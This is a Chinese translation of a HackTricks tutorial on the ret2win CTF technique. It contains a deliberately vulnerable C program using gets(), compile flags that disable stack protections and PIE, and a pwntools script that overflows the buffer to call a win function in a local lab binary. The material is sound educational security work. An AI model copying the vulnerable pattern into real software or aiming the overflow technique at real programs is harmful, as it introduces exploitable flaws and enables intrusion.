mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
.. | ||
README.md | ||
ret2win-arm64.md |
Ret2win
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFT收藏品
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @hacktricks_live。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
基本信息
Ret2win挑战是夺旗赛(CTF)比赛中的一个热门类别,特别是在涉及二进制利用的任务中。目标是利用给定二进制文件中的漏洞,执行二进制文件中的特定未调用函数,通常命名为win
、flag
等。当执行此函数时,通常会打印出一个标志或成功消息。挑战通常涉及覆盖栈上的返回地址,以将执行流重定向到所需的函数。以下是更详细的解释和示例:
C示例
考虑一个简单的C程序,其中存在漏洞和一个我们打算调用的win
函数:
#include <stdio.h>
#include <string.h>
void win() {
printf("Congratulations! You've called the win function.\n");
}
void vulnerable_function() {
char buf[64];
gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
}
int main() {
vulnerable_function();
return 0;
}
要编译此程序而不启用堆栈保护并禁用ASLR,您可以使用以下命令:
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
-m32
: 将程序编译为32位二进制文件(这是可选的,但在CTF挑战中很常见)。-fno-stack-protector
: 禁用对栈溢出的保护。-z execstack
: 允许在栈上执行代码。-no-pie
: 禁用位置无关可执行文件,以确保win
函数的地址不会改变。-o vulnerable
: 将输出文件命名为vulnerable
。
使用Pwntools的Python Exploit
对于利用,我们将使用pwntools,这是一个强大的CTF框架,用于编写利用程序。利用脚本将创建一个有效负载来溢出缓冲区,并用win
函数的地址覆盖返回地址。
from pwn import *
# Set up the process and context for the binary
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
# Find the address of the win function
win_addr = p32(0x08048456) # Replace 0x08048456 with the actual address of the win function in your binary
# Create the payload
# The buffer size is 64 bytes, and the saved EBP is 4 bytes. Hence, we need 68 bytes before we overwrite the return address.
payload = b'A' * 68 + win_addr
# Send the payload
p.sendline(payload)
p.interactive()
要找到win
函数的地址,您可以使用gdb,objdump或任何其他允许您检查二进制文件的工具。例如,使用objdump
,您可以使用:
objdump -d vulnerable | grep win
这个命令将显示win
函数的汇编代码,包括其起始地址。
Python脚本发送一个精心构造的消息,当被vulnerable_function
处理时,会溢出缓冲区并用win
的地址覆盖栈上的返回地址。当vulnerable_function
返回时,不会返回到main
或退出,而是跳转到win
,并打印消息。
保护措施
- PIE 应该被禁用,以便地址在不同执行中是可靠的,否则函数存储的地址不会始终相同,您需要一些泄漏来找出
win
函数加载的位置。在某些情况下,当导致溢出的函数是read
或类似函数时,您可以进行部分覆写,覆写1或2个字节以将返回地址更改为win
函数。由于ASLR的工作原理,最后三个十六进制数字是不随机的,因此有1/16的机会(1个十六进制数字)获得正确的返回地址。 - 栈保护 也应该被禁用,否则受损的EIP返回地址将永远不会被跟随。
其他示例和参考资料
- https://ir0nstone.gitbook.io/notes/types/stack/ret2win
- https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html
- 32位,无ASLR
- https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html
- 64位,带ASLR,带二进制地址泄漏
- https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html
- 64位,无ASLR
- https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html
- 32位,无ASLR,双重小溢出,首先溢出栈并增加第二个溢出的大小
- https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
- 32位,relro,无canary,nx,无pie,格式化字符串以覆盖
fflush
地址为win
函数(ret2win) - https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html
- 32位,nx,无其他保护,部分覆写EIP(1字节)以调用
win
函数 - https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html
- 32位,nx,无其他保护,部分覆写EIP(1字节)以调用
win
函数 - https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html
- 该程序仅验证数字的最后一个字节以检查输入的大小,因此只要最后一个字节在允许范围内,就可以添加任何大小。然后,输入创建一个利用ret2win的缓冲区溢出。
- https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/
- 64位,relro,无canary,nx,pie。部分覆写以调用
win
函数(ret2win)
ARM64示例
{% content-ref url="ret2win-arm64.md" %} ret2win-arm64.md {% endcontent-ref %}
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载PDF版本的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 发现PEASS家族,我们独家NFT的收藏品
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @hacktricks_live。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。